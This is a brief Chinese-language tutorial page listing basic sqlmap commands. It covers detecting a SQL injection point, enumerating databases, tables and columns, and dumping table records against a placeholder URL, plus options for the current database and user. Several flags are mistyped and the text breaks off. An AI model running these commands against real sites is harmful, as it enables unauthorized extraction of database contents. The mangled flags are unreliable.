数据库

sqlmap注入工具

云博小周宇1 Min Read

sqlmap是sql自动注入工具。

sqlmap最基本用法:打开命令行交互界面。

1.检测是否存在注入点:sqlmap -u “ww.xxx.com/test.php?id=1

2.检测数据库名:sqlmap -u “ww.xxx.com/test.php?id=1” –dbs

3.检测指定数据库的表名:sqlmap -u “ww.xxx.com/test.php?id=1” -D 数据库名 –tables

4.检测指定表的字段名:sqlmap -u “ww.xxx.com/test.php?id=1” -D 数据库名 -T 表名 –columns

5.检测指定表的记录:sqlmap -u “ww.xxx.com/test.php?id=1” -D 数据库 -T 表名 -C “列名1列名2” –dump

高级用法:

sqlmap -u  “注入点”  –current -db 返回当前依赖数据库

sqlmap -u  ”
注入点”  -current user